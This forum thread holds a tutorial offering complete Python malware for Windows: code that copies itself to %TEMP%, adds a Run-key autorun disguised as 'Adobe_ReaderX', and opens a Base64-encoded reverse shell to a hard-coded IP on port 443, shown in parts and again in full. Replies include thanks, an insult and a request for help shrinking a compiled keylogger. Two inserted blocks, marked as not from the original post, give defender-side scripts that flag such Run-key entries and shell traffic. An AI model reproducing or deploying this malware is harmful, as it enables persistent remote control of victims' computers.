[Tutorial] 0xC Python Tutorial: Python Malware
#1
This tutorial demonstrates some proof-of-concept code for creating malware using Python and PyInstaller. In a previous tutorial we demonstrated how to compile a Python script into a Portable Executable (PE) using PyInstaller. Now let's demonstrate some quick proof-of-concept code that performs malicious actions on a Windows host.
Coding the Malware:
One of the most common things you'll find with malware is that it wants to gain persistence on the victim. There are many ways to achieve persistence on Windows, one of the more common being to add a value under the registry key "Software\Microsoft\Windows\CurrentVersion\Run". Below is the Python code to copy the program to the %TEMP% directory and then make a registry modification so that the copy executes whenever a user logs on to the computer:


Code:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy executable to %TEMP%:
    os.system('copy %s %s' % (fileName, tempdir))

    # Queries Windows registry for key values
    # Appends autorun key to runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass

    # Set autorun key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass

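As an added defender-side example (not code from the original post), the following script audits Run-key entries for the two traits the snippet above produces: a launch path inside a user-writable temp directory and a vendor-lookalike value name such as "Adobe_ReaderX". The writable-directory list, the lookalike pattern and the sample entries are constructed assumptions; on Windows it reads the live HKLM key with the standard winreg module, elsewhere it runs against the embedded sample.

```python
import re
import sys
RUN_SUBKEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Assumed list of directories a low-privilege process can write to;
# legitimate autoruns almost never launch from them.
WRITABLE_DIRS = (r"%temp%", r"%tmp%", r"\appdata\local\temp",
                 r"%appdata%", r"\users\public", r"%public%")
# A trusted vendor name glued to an arbitrary suffix, e.g. "Adobe_ReaderX".
LOOKALIKE = re.compile(r"^(adobe|google|microsoft|java)[ _-]?\w*$", re.I)

def classify_entry(name, value):
    """Return the reasons a Run value looks suspicious (empty list = fine)."""
    reasons = []
    v = value.lower()
    if any(d in v for d in WRITABLE_DIRS):
        reasons.append("launches from a user-writable temp/profile directory")
    if LOOKALIKE.match(name) and "\\program files" not in v:
        reasons.append("vendor-lookalike name not launched from Program Files")
    return reasons

def audit(entries):
    flagged = []  # [(name, value, reasons)] for every flagged pair
    for name, value in entries:
        reasons = classify_entry(name, value)
        if reasons:
            flagged.append((name, value, reasons))
    return flagged

def read_run_key():
    """Read the live HKLM Run key on Windows; return [] on other platforms."""
    if sys.platform != "win32":
        return []
    import winreg  # Python 3 name of the _winreg module used in the post
    entries = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_SUBKEY) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):  # [1] = number of values
            name, value, _ = winreg.EnumValue(key, i)
            entries.append((name, str(value)))
    return entries

# Constructed sample: the tutorial's entry next to two benign ones.
SAMPLE_RUN_ENTRIES = [
    ("Adobe_ReaderX", r"%TEMP%\mw.exe"),
    ("SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("Adobe Reader Speed Launcher", r'"C:\Program Files\Adobe\Reader\reader_sl.exe"'),
]
if __name__ == "__main__":
    for name, value, reasons in audit(read_run_key() or SAMPLE_RUN_ENTRIES):
        print("%s = %s\n  - %s" % (name, value, "\n  - ".join(reasons)))
```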
Now that we have copied this file to the %TEMP% directory and set up persistence, we can execute the next portion of the code, the reverse shell. I leveraged a publicly released Python reverse shell and made one modification: Base64-encoding the network traffic:


Code:
def shell():
    # Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()

When this program executes it opens a reverse shell back to the "attacker", which in this case is an IP address hard-coded in the script, but it could just as easily be a domain name or a host in the Amazon cloud. Below is a quick screenshot demonstrating the program executing on a Windows host and connecting back to the attacker. Notice that the network traffic is Base64-encoded:
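As an added defender-side example (not from the original post), this classifier shows why Base64 on port 443 does not make the traffic look like HTTPS: a real client opens the connection with a TLS record header, whereas this shell sends a plaintext banner followed by Base64 blobs that decode to printable command output. The sample flow, the truncated ClientHello and the 95% printable-ratio threshold are constructed assumptions.

```python
import base64
import binascii
import re
import string

B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable.encode())

def looks_like_tls(payload):
    """True if the bytes open with a TLS record header: type 0x16, version 3.x."""
    return (len(payload) >= 3 and payload[0] == 0x16
            and payload[1] == 0x03 and payload[2] <= 0x04)

def decode_if_base64_text(payload):
    """Decoded bytes if payload is valid Base64 that decodes to printable text
    (the shape of command output), else None."""
    if len(payload) < 16 or len(payload) % 4 or not B64_RE.match(payload):
        return None
    try:
        decoded = base64.b64decode(payload, validate=True)
    except binascii.Error:
        return None
    # Assumed threshold: >= 95 % printable bytes looks like text, not ciphertext.
    if decoded and sum(b in PRINTABLE for b in decoded) / len(decoded) >= 0.95:
        return decoded
    return None

def classify_flow(dst_port, client_payloads):
    """Verdict for one TCP flow, given the client's payloads in send order."""
    if not client_payloads:
        return "empty"
    if looks_like_tls(client_payloads[0]):
        return "tls"
    if dst_port == 443:
        hits = sum(decode_if_base64_text(p) is not None for p in client_payloads)
        return "base64-shell-on-443" if hits else "plaintext-on-443"
    return "plaintext"

# Constructed sample flow mirroring the post's shell: plaintext banner first,
# then the Base64-encoded output of a directory listing run on the victim.
SAMPLE_OUTPUT = (b" Directory of C:\\Users\\victim\\AppData\\Local\\Temp\r\n\r\n"
                 b"01/01/2015  12:00 PM         4,862,455 mw.exe\r\n")
SAMPLE_FLOW = [b"[*] Connection Established!", base64.b64encode(SAMPLE_OUTPUT)]
# Constructed, truncated TLS 1.0 record carrying a ClientHello, for comparison.
TLS_CLIENT_HELLO = bytes.fromhex("16030100050100000100")

if __name__ == "__main__":
    print(classify_flow(443, SAMPLE_FLOW))         # base64-shell-on-443
    print(classify_flow(443, [TLS_CLIENT_HELLO]))  # tls
```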


Here is the full code:



Code:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy executable to %TEMP%:
    os.system('copy %s %s' % (fileName, tempdir))

    # Queries Windows registry for the autorun key value
    # Stores the key values in runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass

    # If the autorun key "Adobe ReaderX" isn't set this will set the key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass

def shell():
    # Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()
#2
(09-04-2015, 08:06 PM)Codefire Wrote: This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller. [...]
#3
Sven is dumber than Stevie Wonder's eyesight.
#4
thanks for sharing bro
#5
Interesting from script to executable lol, thx.
#6
(09-04-2015, 08:06 PM)Codefire Wrote: This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller. [...]
#7
Hello great hackers and programmers,
I want to know how it is possible to compile my keylogger using PyInstaller; the final executable file seems to be pretty big.
Please, how can I reduce the file size?
#8
I'll have to look into this
#9
looks nice... will give it a try
#10
Thanks for this tutorial